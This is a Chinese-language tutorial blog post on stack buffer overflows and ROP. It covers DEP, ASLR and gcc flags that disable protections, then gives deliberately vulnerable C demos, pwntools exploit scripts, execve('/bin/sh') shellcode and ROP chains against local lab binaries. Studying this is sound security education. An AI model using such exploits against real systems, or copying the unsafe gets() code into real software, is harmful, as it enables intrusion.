<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="Buffer Overflow 以及 ROP">
<meta property="og:type" content="article">
<meta property="og:title" content="Pwn-1">
<meta property="og:url" content="http://yoursite.com/2018/10/07/pwn-1/index.html">
<meta property="og:site_name" content="Archer">
<meta property="og:description" content="Buffer Overflow 以及 ROP">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://i.imgur.com/oWAF0jV.png">
<meta property="og:image" content="https://i.imgur.com/ROm6c9x.png">
<meta property="og:image" content="https://i.imgur.com/0Ldqeub.png">
<meta property="og:image" content="https://i.imgur.com/JUr4NRQ.png">
<meta property="og:image" content="https://i.imgur.com/RUg6uLZ.png">
<meta property="og:image" content="https://i.imgur.com/ZzOOZZa.png">
<meta property="og:image" content="https://i.imgur.com/wdYhGuo.png">
<meta property="og:image" content="https://i.imgur.com/p9FgQSF.png">
<meta property="og:image" content="https://i.imgur.com/0VZIsWN.png">
<meta property="og:image" content="https://i.imgur.com/9dbuBD3.png">
<meta property="og:updated_time" content="2018-11-11T13:33:40.886Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Pwn-1">
<meta name="twitter:description" content="Buffer Overflow 以及 ROP">
<meta name="twitter:image" content="https://i.imgur.com/oWAF0jV.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/10/07/pwn-1/"/>





  <title>Pwn-1 | Archer</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Archer</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/10/07/pwn-1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Fake Student">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Archer">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Pwn-1</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-10-07T16:54:01+08:00">
                2018-10-07
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p><strong>Buffer Overflow</strong> 以及 <strong>ROP</strong></p>
<a id="more"></a>
<p>##<strong>保护机制</strong> </p>
<h3 id="Data-Execution-Prevention"><a href="#Data-Execution-Prevention" class="headerlink" title="Data Execution Prevention"></a>Data Execution Prevention</h3><table><tr><td bgcolor="#FF7F24">DEP 可以跑的不可以写，可以写的不可以跑#D1EEEE</td></tr></table>

<h3 id="ASLR"><a href="#ASLR" class="headerlink" title="ASLR"></a>ASLR</h3><table><tr><td bgcolor="#FF7F24">DEP Address Space Layout Randomization（地址空间布局随机化），该技术在2005年的kernel2.6.12中被引入到Linux系统，它将进程的某些内存空间地址进行随机化来增大入侵者预测目的地址的难度，从而降低进程被成功入侵的风险。当前Linux、Windows等主流操作系统都已经采用该项技术。</td></tr></table>

<h4 id="ASLR等级"><a href="#ASLR等级" class="headerlink" title="ASLR等级"></a>ASLR等级</h4><table><tr><td bgcolor="#FF7F24">0: 完全关闭ASLR </td></tr></table><br><table><tr><td bgcolor="#FF7F24">1: 保留的随机化。共享库、栈、mmap（）以及VDSO将被随机化。 </td></tr></table><br><table><tr><td bgcolor="#FF7F24">2：完全随机化，通过brk（）分配的内存空间也将被随机化 </td></tr></table>

<p>PS：</p>
<ul>
<li>ASLR并不负责BSSBSS段、代码段（文本段）和数据段（DATA段）的随机化。</li>
<li>堆栈空间被完全随机化。</li>
</ul>
<hr>
<h2 id="gcc编译"><a href="#gcc编译" class="headerlink" title="gcc编译"></a>gcc编译</h2><table><tr><td bgcolor="#FF7F24"><br><br>1. 无栈保护：-fno-stack-protector<br>2. 无DEP:  -z execstack<br>3. 生成静态: -static<br>4. 生成32(64)位： -m32(64)<br><br>例子： gcc demo1.c -o demo1 -fno-stack-protector -z execstack -static -m32<br>+  ROPgadget –binary Demo2 &gt; gadgets –depth 20 （默认深度10）<br></td></tr></table>

<hr>
<h2 id="demo1-–-overflow"><a href="#demo1-–-overflow" class="headerlink" title="demo1 – overflow"></a>demo1 – overflow</h2><h3 id="源码"><a href="#源码" class="headerlink" title="源码"></a>源码</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">#include&lt;stdio.h&gt;</span><br><span class="line">#include&lt;stdlib.h&gt;</span><br><span class="line">#include&lt;unistd.h&gt;</span><br><span class="line"></span><br><span class="line">void A()&#123;</span><br><span class="line">	setvbuf(stdout,0,_IONBF,0);</span><br><span class="line">        srand(time(0)^getpid());</span><br><span class="line">        char buf[100];</span><br><span class="line">        int magic = rand();</span><br><span class="line">        gets(buf);</span><br><span class="line">        if(atoi(buf)==magic)&#123;</span><br><span class="line">                puts(&quot;OKay...&quot;);</span><br><span class="line">                system(&quot;sh&quot;);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">int main()&#123;</span><br><span class="line">        A();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h3><ul>
<li>并没有开aslr 和其他保护</li>
<li>并且可以overflow覆盖掉ret_address，直接跳转到puts语句</li>
<li>puts地址可以利用objdump来查找</li>
</ul>
<p><img src="https://i.imgur.com/oWAF0jV.png" alt=""></p>
<p><img src="https://i.imgur.com/ROm6c9x.png" alt=""></p>
<h3 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">p=process(&quot;./demo1&quot;)</span><br><span class="line">payload=&quot;A&quot;*116+p32(0x804861b)</span><br><span class="line">#gdb.attach(p)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="问题"><a href="#问题" class="headerlink" title="问题"></a>问题</h3><ul>
<li>第一次自己是想要直接跳到puts@plt的位置，跳转成功但总是拿不到sh，后面发现可能是自己直接跳转过去并没有将运行好puts后要返回的地址压入栈所以失败</li>
<li>第二次自己就打算直接跳转system@plt 但是不知道为什么失败</li>
<li>第三次跳转到函数中call system(“sh”) 语句 失败</li>
<li>第四次 跳转到函数中 call puts(“OKay…”) 然后执行下来才可行</li>
</ul>
<hr>
<h2 id="Demo2-NO-DEP-–Return-Oriented-Programming"><a href="#Demo2-NO-DEP-–Return-Oriented-Programming" class="headerlink" title="Demo2(NO DEP) –Return Oriented Programming"></a>Demo2(NO DEP) –Return Oriented Programming</h2><h3 id="源码-1"><a href="#源码-1" class="headerlink" title="源码"></a>源码</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">#include&lt;stdio.h&gt;</span><br><span class="line">#include&lt;string.h&gt;</span><br><span class="line">void A()&#123;</span><br><span class="line">	char buf[100];</span><br><span class="line">	gets(buf);</span><br><span class="line">	puts(buf);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">int main()&#123;</span><br><span class="line">	A();</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="分析-1"><a href="#分析-1" class="headerlink" title="分析"></a>分析</h3><ul>
<li>开启了ASLR，所以栈地址都为随机</li>
<li>可以尝试buffer overflow 来再次调用gets函数并输入shellcode并同时返回shellcode地址并执行</li>
<li>gets参数设定，第一个参数为要写入文本的地址，第二个参数为要返回的地址，但是是第二个参数先入栈，然后第一个参数再入栈。</li>
</ul>
<h3 id="步骤"><a href="#步骤" class="headerlink" title="步骤"></a>步骤</h3><ul>
<li>利用寻找offset（利用pattc和patto）</li>
<li>利用objdump寻找到gets_addr</li>
</ul>
<p><img src="https://i.imgur.com/0Ldqeub.png" alt=""></p>
<ul>
<li>因为BSS段地址不受ASLR影响，所以只要在BSS段找到可以写可以执行的地址即可（gdb中利用vmmap查看）<br><img src="https://i.imgur.com/JUr4NRQ.png" alt=""></li>
<li>因为BSS段中可能储存某些数据，但是整个数据段又不会完全占用，所以我们只要在(数段段尾地址-0x100)的地址写入shellcode</li>
</ul>
<h3 id="Shellcode"><a href="#Shellcode" class="headerlink" title="Shellcode"></a>Shellcode</h3><table><tr><td bgcolor="#FF7F24"> shellcode=\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80 </td></tr></table>

<h3 id="EXP-1"><a href="#EXP-1" class="headerlink" title="EXP"></a>EXP</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">p=process(&quot;./demo2&quot;)</span><br><span class="line">offset=112</span><br><span class="line">gets_addr=p32(0x8048300)</span><br><span class="line">ret_addr=p32(0x0804b000-0x100)</span><br><span class="line">write_addr=p32(0x0804b000-0x100)</span><br><span class="line">payload=&quot;A&quot;*offset</span><br><span class="line">		+gets_addr</span><br><span class="line">		+ret_addr	  # return address of gets()</span><br><span class="line">		+write_addr   # first arg</span><br><span class="line">#gdb.attach(p)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">shellcode=&quot;\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80&quot;</span><br><span class="line">p.sendline(shellcode)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="Another-EXP"><a href="#Another-EXP" class="headerlink" title="Another EXP"></a>Another EXP</h3><ul>
<li>使用ELF会帮忙自动寻找某个函数的地址</li>
<li>上面例子中p32(hex(elf.bss()))会报错</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">p=process(&quot;./demo2&quot;)</span><br><span class="line">elf=ELF(&quot;./demo2&quot;)</span><br><span class="line">offset=112</span><br><span class="line">gets_addr=elf.symbols[&quot;gets&quot;]</span><br><span class="line">ret_addr=elf.bss()</span><br><span class="line">write_addr=elf.bss()</span><br><span class="line">payload=&quot;A&quot;*offset+p32(gets_addr)+p32(write_addr)+p32(ret_addr)</span><br><span class="line">#gdb.attach(p)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">shellcode=&quot;\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80&quot;</span><br><span class="line">p.sendline(shellcode)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<hr>
<h2 id="Demo3-DEP-–ROP-Chain"><a href="#Demo3-DEP-–ROP-Chain" class="headerlink" title="Demo3(DEP) –ROP Chain"></a>Demo3(DEP) –ROP Chain</h2><h3 id="源码-2"><a href="#源码-2" class="headerlink" title="源码"></a>源码</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">#include&lt;stdio.h&gt;</span><br><span class="line">#include&lt;stdlib.h&gt;</span><br><span class="line">#include&lt;unistd.h&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">int main()&#123;</span><br><span class="line">        setvbuf(stdout,0,_IONBF,0);</span><br><span class="line">        srand(time(0)^getpid());</span><br><span class="line">        char buf[100];</span><br><span class="line">        int magic = rand();</span><br><span class="line">        gets(buf);</span><br><span class="line">        if(atoi(buf)==magic)&#123;</span><br><span class="line">                puts(&quot;OKay...&quot;);</span><br><span class="line">                puts(&quot;/bin/sh&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="分析-2"><a href="#分析-2" class="headerlink" title="分析"></a>分析</h3><ul>
<li>因为程序开启了DEP，所以可以写的地方不可执行，可以执行的地方不可写</li>
<li>只能利用gadget来拼凑自己想要的System Call</li>
<li><p>用ROPgadget –binary 来寻找gadge</p>
</li>
<li><p>例寻找 pop eax</p>
</li>
</ul>
<p><img src="https://i.imgur.com/RUg6uLZ.png" alt=""></p>
<ul>
<li>当程序中没有/bin/sh 需要自己写到bss段 然后跳过去</li>
</ul>
<h3 id="System-Call"><a href="#System-Call" class="headerlink" title="System Call"></a>System Call</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">eax=11 (execve)</span><br><span class="line">ebx=&quot;/bin/sh&quot;</span><br><span class="line">ecx=0</span><br><span class="line">edx=0</span><br><span class="line">int 0x80 -execve(&quot;/bin/sh&quot;,0,0)</span><br></pre></td></tr></table></figure>
<h3 id="EXP-2"><a href="#EXP-2" class="headerlink" title="EXP"></a>EXP</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">p=process(&quot;./demo3&quot;)</span><br><span class="line">offset=116</span><br><span class="line">p_bd_r=0x0806faf9</span><br><span class="line">p_ecx_r=0x080df1ad</span><br><span class="line">p_eax_r=0x0807cb3b</span><br><span class="line">sh=0x80bb870</span><br><span class="line">int_0x80=0x0806d736</span><br><span class="line">#gdb.attach(p)</span><br><span class="line">payload=&quot;A&quot;*offset+p32(p_eax_r)+p32(11)+ p32(p_bd_r)+p32(sh)+p32(0)+p32(p_ecx_r)+p32(0)+p32(int_0x80)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<ul>
<li><p>自己写入/bin/sh</p>
<h3 id="EXP1"><a href="#EXP1" class="headerlink" title="EXP1"></a>EXP1</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">p=process(&quot;./demo3&quot;)</span><br><span class="line">elf=ELF(&quot;./demo3&quot;)</span><br><span class="line">offset=116</span><br><span class="line">p_bd_r=0x0806faf9</span><br><span class="line">p_ecx_r=0x080df1ad</span><br><span class="line">p_eax_r=0x0807cb3b</span><br><span class="line">write_addr=elf.bss()</span><br><span class="line">ret_addr=p_eax_r</span><br><span class="line">int_0x80=0x0806d736</span><br><span class="line">gets_addr=elf.symbols[&quot;gets&quot;]</span><br><span class="line">ret_addr=p_eax_r</span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line">payload=&quot;A&quot;*offset+p32(gets_addr)+p32(p_ecx_r)+p32(write_addr)+p32(p_eax_r)+p32(11)+p32(p_bd_r)+p32(write_addr)+p32(0)+p32(p_ecx_r)+p32(0)+p32(int_0x80)</span><br><span class="line"></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
</li>
<li><p>发现栈上多了一格，所以需要先pop一格</p>
</li>
</ul>
<p><img src="https://i.imgur.com/ZzOOZZa.png" alt=""></p>
<h3 id="ROPgadget-编译出错"><a href="#ROPgadget-编译出错" class="headerlink" title="ROPgadget 编译出错"></a>ROPgadget 编译出错</h3><ul>
<li><p>发现导入部分文件失败，百度后发现是libcapstone.so未放入castone下<br><img src="https://i.imgur.com/wdYhGuo.png" alt=""></p>
</li>
<li><p>寻找libcapstone.so文件<br><img src="https://i.imgur.com/p9FgQSF.png" alt=""></p>
</li>
<li><p>利用 pip show castone 查询路径<br><img src="https://i.imgur.com/0VZIsWN.png" alt=""></p>
</li>
</ul>
<ul>
<li>最后将libcapstone.so拷贝到capstone目录下即可<br><img src="https://i.imgur.com/9dbuBD3.png" alt=""></li>
</ul>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/09/19/believeme/" rel="next" title="believeme">
                <i class="fa fa-chevron-left"></i> believeme
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/10/30/linux-远程连接/" rel="prev" title="linux 远程连接">
                linux 远程连接 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Fake Student</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">31</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#Data-Execution-Prevention"><span class="nav-number">1.</span> <span class="nav-text">Data Execution Prevention</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ASLR"><span class="nav-number">2.</span> <span class="nav-text">ASLR</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#ASLR等级"><span class="nav-number">2.1.</span> <span class="nav-text">ASLR等级</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#gcc编译"><span class="nav-number"></span> <span class="nav-text">gcc编译</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#demo1-–-overflow"><span class="nav-number"></span> <span class="nav-text">demo1 – overflow</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#源码"><span class="nav-number">1.</span> <span class="nav-text">源码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#分析"><span class="nav-number">2.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#EXP"><span class="nav-number">3.</span> <span class="nav-text">EXP</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#问题"><span class="nav-number">4.</span> <span class="nav-text">问题</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Demo2-NO-DEP-–Return-Oriented-Programming"><span class="nav-number"></span> <span class="nav-text">Demo2(NO DEP) –Return Oriented Programming</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#源码-1"><span class="nav-number">1.</span> <span class="nav-text">源码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#分析-1"><span class="nav-number">2.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#步骤"><span class="nav-number">3.</span> <span class="nav-text">步骤</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Shellcode"><span class="nav-number">4.</span> <span class="nav-text">Shellcode</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#EXP-1"><span class="nav-number">5.</span> <span class="nav-text">EXP</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Another-EXP"><span class="nav-number">6.</span> <span class="nav-text">Another EXP</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Demo3-DEP-–ROP-Chain"><span class="nav-number"></span> <span class="nav-text">Demo3(DEP) –ROP Chain</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#源码-2"><span class="nav-number">1.</span> <span class="nav-text">源码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#分析-2"><span class="nav-number">2.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#System-Call"><span class="nav-number">3.</span> <span class="nav-text">System Call</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#EXP-2"><span class="nav-number">4.</span> <span class="nav-text">EXP</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#EXP1"><span class="nav-number">5.</span> <span class="nav-text">EXP1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ROPgadget-编译出错"><span class="nav-number">6.</span> <span class="nav-text">ROPgadget 编译出错</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Fake Student</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
